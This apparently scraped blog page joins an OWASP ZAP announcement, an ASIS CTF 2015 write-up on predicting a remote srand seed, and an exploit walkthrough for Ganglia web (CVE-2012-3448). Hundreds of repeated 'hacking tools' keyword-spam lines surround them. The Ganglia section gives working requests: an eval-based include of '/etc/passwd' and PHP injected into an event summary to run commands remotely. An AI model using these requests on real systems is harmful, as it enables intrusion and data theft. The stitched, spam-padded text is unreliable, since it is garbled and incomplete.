OWASP ZAP Project - Zed Attack Proxy Team Releases Two Initiatives

The Zed Attack Proxy team is pleased to announce two recently released initiatives:

ZAP In Ten

The team have just launched a new series of videos called 'ZAP in Ten' in conjunction with AllDayDevOps.

ZAP in Ten is a series of short form videos featuring Simon Bennetts, project lead of the OWASP Zed Attack Proxy (ZAP)  project. Each video highlights a specific feature or resource for ZAP.

ZAP API Docs

As part of OWASP's participation in Google's Season of Docs, the ZAP project has had @sshniro working on API documentation. The first iteration of the documentation is now live.  It includes Java, Python, and shell example snippets all presented in a responsive and accessible design. Which we will continue to build on in the future.

Big thanks to Nirojan for his efforts on this wonderful initiative!  Congratulations and thanks to Google Open Source for helping to bring the open source and technical writer communities together!More info

• Pentest Box Tools Download
• Blackhat Hacker Tools
• Hack Tools Online
• Nsa Hack Tools Download
• Nsa Hack Tools
• Bluetooth Hacking Tools Kali
• Ethical Hacker Tools
• Hacking Tools Hardware
• Pentest Tools Url Fuzzer
• What Are Hacking Tools
• Hackrf Tools
• Pentest Tools Github
• Pentest Tools Subdomain
• Hacker Tools Mac
• Physical Pentest Tools
• Hacking Tools Free Download
• Hacking Apps
• Hacker Tools Software
• Pentest Reporting Tools
• Pentest Tools Open Source
• Pentest Tools Bluekeep
• Pentest Recon Tools
• Hack Tools 2019
• Pentest Tools Website
• Hack Tools Pc
• Nsa Hacker Tools
• Hacker Tools List
• Hacking Tools Usb
• Hack Tools Pc
• Hacker Security Tools
• Hacker Tools For Ios
• Pentest Tools Download
• Hacker Tools For Pc
• Hacking Tools Github
• Hack Tool Apk No Root
• Tools 4 Hack
• Pentest Tools Nmap
• How To Make Hacking Tools
• Wifi Hacker Tools For Windows
• New Hack Tools
• Best Hacking Tools 2020
• Blackhat Hacker Tools
• Pentest Tools
• Hacker Tools Linux
• What Are Hacking Tools
• New Hack Tools
• Hacking Tools And Software
• Hacking Tools And Software
• Hacking Tools Windows
• Hacking Tools Pc
• Pentest Recon Tools
• Pentest Tools Android
• Hacking Tools For Windows
• Hacker Tools Software
• Hacker Tools Mac
• Pentest Reporting Tools
• Hacking Tools For Windows
• Hacker Tools For Mac
• Hack Tools For Pc
• Blackhat Hacker Tools
• Hacker Techniques Tools And Incident Handling
• Hack App
• Pentest Tools For Windows
• Black Hat Hacker Tools
• Hacking App
• Hack Tools 2019
• Computer Hacker
• Hack App
• Hacker Tools
• Hacking Tools Hardware
• New Hacker Tools

ASIS CTF Quals 2015 - Sawthis Writeup - Srand Remote Prediction

The remote service ask for a name, if you send more than 64 bytes, a memory leak happens.
The buffer next to the name's is the first random value used to init the srand()

If we get this value, and set our local srand([leaked] ^ [luckyNumber]) we will be able to predict the following randoms and win the game, but we have to see few details more ;)

The function used to read the input until the byte \n appears, but also up to 64 bytes, if we trigger this second condition there is not 0x00 and the print shows the random buffer :)

The nickname buffer:



The seed buffer:



So here it is clear, but let's see that the random values are computed with several gpu instructions which are decompiled incorrectly:







We tried to predict the random and aply the gpu divisions without luck :(



There was a missing detail in this predcitor, but there are always other creative ways to do the things.
We use the local software as a predictor, we inject the leaked seed on the local binary of the remote server and got a perfect syncronization, predicting the remote random values:




The process is a bit ugly becouse we combined automated process of leak exctraction and socket interactive mode, with the manual gdb macro.

The macro:

Continue reading

1. Pentest Tools Url Fuzzer
2. Pentest Tools Alternative
3. Pentest Tools Bluekeep
4. Black Hat Hacker Tools
5. Pentest Tools Github
6. Hacker Tools 2020
7. Hack Website Online Tool
8. Hacker Tools Software
9. Hacker Tools For Mac
10. Android Hack Tools Github
11. Pentest Tools For Ubuntu
12. Hack Tools For Windows
13. Hacker Tools Linux
14. What Are Hacking Tools
15. Hacker Tools For Mac
16. Nsa Hack Tools
17. Hacker Tools Mac
18. Hacker Security Tools
19. Hacker Search Tools
20. Termux Hacking Tools 2019
21. Hackers Toolbox
22. Beginner Hacker Tools
23. Hacking Tools Kit
24. Best Hacking Tools 2019
25. Pentest Tools Website
26. Hacker Tools Windows
27. Hack Tool Apk
28. Underground Hacker Sites
29. How To Hack
30. Tools For Hacker
31. Black Hat Hacker Tools
32. What Are Hacking Tools
33. Best Pentesting Tools 2018
34. Hacker Tools Software
35. Pentest Box Tools Download
36. Hacking Tools Github
37. Pentest Tools Linux
38. Pentest Tools Nmap
39. Pentest Tools For Ubuntu
40. Hackrf Tools
41. Hack Tool Apk No Root
42. Pentest Tools Framework
43. Hacking Tools For Mac
44. Hacks And Tools
45. Pentest Tools Subdomain
46. Pentest Tools Free
47. Hack Tools For Ubuntu
48. Top Pentest Tools
49. Pentest Tools For Android
50. Hacker Tools For Ios
51. Hacking Tools Name
52. Github Hacking Tools
53. Hack Website Online Tool
54. Hack Tools Github
55. Pentest Tools Open Source
56. Pentest Tools Alternative
57. Pentest Tools Website
58. Hacking Tools Pc
59. Hacking Tools Online
60. Hack Tools For Ubuntu
61. Pentest Tools Website
62. Hack Tools 2019
63. Hacker Search Tools
64. Hack Website Online Tool
65. Hack Rom Tools
66. Pentest Tools Apk
67. Hack Tools
68. Pentest Tools Open Source
69. Hacking Tools For Windows 7
70. Hacking App
71. Hacker Tools List
72. Hacker Tools
73. Pentest Tools Download
74. Hack Tools
75. Hacking Tools Software
76. Hack Rom Tools
77. Hacking Tools Online
78. Hacking Tools For Kali Linux
79. Hack Tool Apk
80. Underground Hacker Sites
81. Pentest Box Tools Download
82. Pentest Tools Online
83. Hack Tools For Windows
84. Hacker Tools Free Download
85. How To Install Pentest Tools In Ubuntu
86. Pentest Reporting Tools
87. Hacking Tools For Games
88. How To Hack
89. Tools 4 Hack
90. Hacking Tools For Windows Free Download
91. Hacker Tools Free
92. Hak5 Tools
93. Hacking Tools Software
94. Physical Pentest Tools
95. Pentest Tools Website
96. Hacking Tools For Games
97. Install Pentest Tools Ubuntu
98. Free Pentest Tools For Windows
99. Github Hacking Tools
100. Hack Tools For Mac
101. How To Hack
102. Hack Website Online Tool
103. Kik Hack Tools
104. Hack App
105. Pentest Tools Url Fuzzer
106. Hacker Tools Apk Download
107. Hak5 Tools
108. Wifi Hacker Tools For Windows
109. Pentest Tools Github
110. Pentest Tools Apk
111. Hack Tools
112. Hacker Security Tools
113. Android Hack Tools Github
114. Pentest Tools Download
115. Hacking Tools For Games
116. Pentest Tools Open Source
117. Hacking Tools 2019
118. Hacker Tools Software
119. Hacker Security Tools
120. Hacking Tools 2020
121. Pentest Tools For Windows
122. Pentest Tools Url Fuzzer
123. Hack App
124. Hack Tools For Pc
125. Best Pentesting Tools 2018
126. Ethical Hacker Tools
127. Pentest Tools Website
128. Pentest Tools List
129. Hacks And Tools
130. Hacker Tools Online
131. Hacking Tools Pc
132. Pentest Tools
133. Hacker Tools Mac
134. Hacking Tools For Windows
135. What Are Hacking Tools
136. Github Hacking Tools
137. Pentest Tools For Windows
138. Hacking Tools Kit
139. Easy Hack Tools
140. Hack And Tools
141. Pentest Tools Website
142. Hacker
143. Tools For Hacker
144. Hacking Tools Download
145. New Hack Tools
146. Pentest Tools Android
147. Pentest Tools Website
148. Hacking Tools For Windows Free Download
149. Hack Tools
150. New Hack Tools
151. Hacker Tools Apk Download
152. Hacking Tools Pc
153. Hacking Tools Kit
154. Beginner Hacker Tools
155. Hak5 Tools
156. Hack Tools Pc
157. Best Pentesting Tools 2018
158. Pentest Tools Download
159. Hacks And Tools
160. Hackrf Tools
161. Pentest Tools Github
162. Hak5 Tools
163. Hack Tools Mac
164. Hacking Tools For Beginners
165. Growth Hacker Tools
166. Hack Tools For Mac
167. Hacker Tools 2019
168. Pentest Tools Free
169. Pentest Tools Website Vulnerability
170. Hack Tool Apk No Root
171. Pentest Tools For Android

Extending Your Ganglia Install With The Remote Code Execution API

Previously I had gone over a somewhat limited local file include in the Ganglia monitoring application (http://ganglia.info). The previous article can be found here -
http://console-cowboys.blogspot.com/2012/01/ganglia-monitoring-system-lfi.html

I recently grabbed the latest version of the Ganglia web application to take a look to see if this issue has been fixed and I was pleasantly surprised... github is over here -
https://github.com/ganglia/ganglia-web
Looking at the code the following (abbreviated "graph.php") sequence can be found -

$graph = isset($_GET["g"])  ?  sanitize ( $_GET["g"] )   : "metric";
....
$graph_arguments = NULL;
$pos = strpos($graph, ",");
$graph_arguments = substr($graph, $pos + 1);
....
eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');


I can only guess that this previous snippet of code was meant to be used as some sort of API put in place for remote developers, unfortunately it is slightly broken. For some reason when this API was being developed part of its interface was wrapped in the following function -

function sanitize ( $string ) {
  return  escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}


According the the PHP documentation -
Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.


This limitation of the API means we cannot simply pass in a function like eval, exec, system, or use backticks to create our Ganglia extension. Our only option is to use PHP functions that do not require "(" or ")" a quick look at the available options (http://www.php.net/manual/en/reserved.keywords.php) it looks like "include" would work nicely. An example API request that would help with administrative reporting follows:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/etc/passwd'

Very helpful, we can get a nice report with a list of current system users. Reporting like this is a nice feature but what we really would like to do is create a new extension that allows us to execute system commands on the Ganglia system. After a brief examination of the application it was found that we can leverage some other functionality of the application to finalize our Ganglia extension. The "events" page allows for a Ganglia user to configure events in the system, I am not exactly sure what type of events you would configure, but I hope that I am invited.

As you can see in the screen shot I have marked the "Event Summary" with "php here". When creating our API extension event we will fill in this event with the command we wish to run, see the following example request -
http://192.168.18.157/gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00%20&end_time=07/02/2012%2000:00%20&host_regex=

This request will set up an "event" that will let everyone know who you are, that would be the friendly thing to do when attending an event. We can now go ahead and wire up our API call to attend our newly created event. Since we know that Ganglia keeps track of all planned events in the following location "/var/lib/ganglia/conf/events.json" lets go ahead and include this file in our API call - 
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json'

As you can see we have successfully made our API call and let everyone know at the "event" that our name is "www-data". From here I will leave the rest of the API development up to you. I hope this article will get you started on your Ganglia API development and you are able to implement whatever functionality your environment requires. Thanks for following along.

Update: This issue has been assigned CVE-2012-3448

Continue reading

1. Hacker Tools Free
2. Hacker Tools 2019
3. Pentest Automation Tools
4. Hacking Tools Software
5. Tools For Hacker
6. Termux Hacking Tools 2019
7. Pentest Tools Android
8. Hacker Security Tools
9. Hacker Tools 2019
10. Game Hacking
11. Hak5 Tools
12. Hacker Tools Apk Download
13. Pentest Tools Apk
14. Github Hacking Tools
15. Pentest Tools Linux
16. Hack Tools For Mac
17. Hacking Tools Windows
18. Hack And Tools
19. Hacker Tools List
20. Hacker Security Tools
21. Hacker Search Tools
22. Pentest Tools Tcp Port Scanner
23. Hacking Tools For Mac
24. Hacking Apps
25. Underground Hacker Sites
26. Hak5 Tools
27. Pentest Tools Windows
28. Hacker Security Tools
29. Hacking Tools 2020
30. Pentest Tools For Ubuntu
31. Hacker Tools For Pc
32. Hack Tool Apk No Root
33. Best Hacking Tools 2019
34. Hack Tools 2019
35. Hack Apps
36. Hack Rom Tools
37. Hack Tools Online
38. Pentest Tools Framework
39. Hacking Tools Online
40. Install Pentest Tools Ubuntu
41. How To Hack
42. Hacking Tools Hardware
43. Game Hacking
44. Hacking Tools For Mac
45. Pentest Tools Alternative
46. Pentest Tools Nmap
47. Hack Tools Online
48. New Hacker Tools
49. Hacking Tools Free Download
50. Nsa Hack Tools Download
51. New Hacker Tools
52. Hacking Tools Windows 10
53. Hack Tools Github
54. Tools 4 Hack
55. Best Pentesting Tools 2018
56. Hacking App
57. Pentest Tools Online
58. Hacking Tools For Windows 7
59. Ethical Hacker Tools
60. Hack Tools 2019
61. Hacking Tools For Windows 7
62. Hack Tools For Windows
63. Pentest Tools Free
64. Hacker Tools 2020
65. Best Hacking Tools 2020
66. Hacking Tools Software
67. Pentest Tools Website
68. Install Pentest Tools Ubuntu
69. Hackrf Tools
70. Hack Tools Download
71. Pentest Tools For Ubuntu
72. Pentest Tools Alternative
73. Hacker Tools Online
74. Pentest Tools Review
75. Pentest Tools Url Fuzzer
76. Pentest Tools Bluekeep
77. Hacking Apps
78. Hack And Tools
79. Hacking Tools For Windows 7
80. Hack App
81. Hack Tools Download
82. Hack Apps
83. Hacking Tools For Games
84. Wifi Hacker Tools For Windows
85. Best Hacking Tools 2019
86. World No 1 Hacker Software
87. Hacker Tools Apk Download
88. Hacking Tools Hardware
89. Hackrf Tools
90. Beginner Hacker Tools
91. Hak5 Tools
92. Hacking Tools For Mac
93. Hacking Tools Windows 10
94. Android Hack Tools Github
95. Hacker Tools Apk
96. Hack Tools
97. Pentest Tools Nmap
98. Hacking Apps
99. Hacker Tools Apk
100. Hacker Tools For Pc
101. Pentest Tools Framework
102. Hacker Tools Free Download
103. Kik Hack Tools
104. Pentest Reporting Tools
105. Termux Hacking Tools 2019
106. Pentest Tools
107. Hacker Tools For Ios
108. Hacker Tools For Windows
109. Nsa Hack Tools
110. Hacker Security Tools
111. Pentest Tools Android
112. Pentest Tools Review
113. Hack App
114. Pentest Tools Free
115. Hacker Tools
116. Pentest Tools Subdomain
117. Hacking Tools Online
118. Pentest Tools Alternative
119. Tools 4 Hack
120. Pentest Tools Port Scanner
121. Pentest Tools Bluekeep
122. Hacker Tools List